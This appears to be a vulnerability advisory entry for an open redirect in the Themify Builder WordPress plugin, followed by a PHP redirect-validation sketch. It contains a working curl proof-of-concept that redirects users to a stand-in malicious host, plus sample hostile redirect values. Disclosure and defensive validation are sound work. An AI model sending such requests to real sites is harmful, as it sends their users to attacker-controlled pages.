wpvulndb | Valentin LOBSTEIN | WPVDB-ID: D130A60C-C36B-4994-9B0E-E52CD7F99387
May 23, 2024 - 12:00 a.m.

Themify Builder < 7.5.8 - Open Redirect

wpscan.com
themify builder
open redirect
vulnerability

AI Score

6.4

Confidence

High

EPSS

0.001

Percentile

17.1%

Description

The plugin does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue.

PoC

curl -kvL https://www.example.com/wp-login.php \
  -e http://arbitrary-referer \
  -d "log=invalid_username&pwd=invalid_password&tb_login=1&tb_redirect_fail=https://malicious-site.com"

- https://www.example.com should be replaced with the affected WordPress site URL.
- The request triggers a 302 redirect to the URL specified in tb_redirect_fail.
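The missing check from the description, sketched as an added example for defenders. It is not Themify Builder's code or its actual fix; the function name example_validate_redirect, the fallback path and the sample values are assumptions made for illustration.

```php
<?php
// Added example: not Themify Builder code. Function name and sample values are hypothetical.

/**
 * Return $target only if it stays on $siteHost; otherwise return $fallback.
 */
function example_validate_redirect(string $target, string $siteHost, string $fallback = '/wp-login.php'): string
{
    $target = trim($target);
    // Control characters and backslashes are rejected: browsers may drop or
    // rewrite them, turning a harmless-looking value into "//other-host".
    if ($target === '' || preg_match('/[\x00-\x1F\x7F\\\\]/', $target)) {
        return $fallback;
    }
    // "//host/path" is protocol-relative, i.e. an absolute URL to another host.
    if (strncmp($target, '//', 2) === 0) {
        return $fallback;
    }
    $parts = parse_url($target);
    if ($parts === false) {
        return $fallback;
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    $host   = strtolower($parts['host'] ?? '');
    if ($scheme === '' && $host === '') {
        // No scheme or host: accept only a path rooted at this site.
        return $target[0] === '/' ? $target : $fallback;
    }
    // Absolute URL: http(s) only, no userinfo, host must match exactly.
    if (!in_array($scheme, ['http', 'https'], true) || isset($parts['user'])) {
        return $fallback;
    }
    return $host === strtolower($siteHost) ? $target : $fallback;
}

// Constructed inputs, including the tb_redirect_fail value from the PoC above.
$samples = [
    'https://malicious-site.com',
    '//malicious-site.com/login',
    'https://www.example.com@malicious-site.com/',
    'ftp://www.example.com/file',
    '/wp-login.php?login=failed',
    'https://www.example.com/my-account/',
];
foreach ($samples as $value) {
    printf("%-45s => %s\n", $value, example_validate_redirect($value, 'www.example.com'));
}
```

Inside WordPress itself, the core helpers wp_validate_redirect() and wp_safe_redirect() perform this kind of host check and are the usual choice over a hand-written validator.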
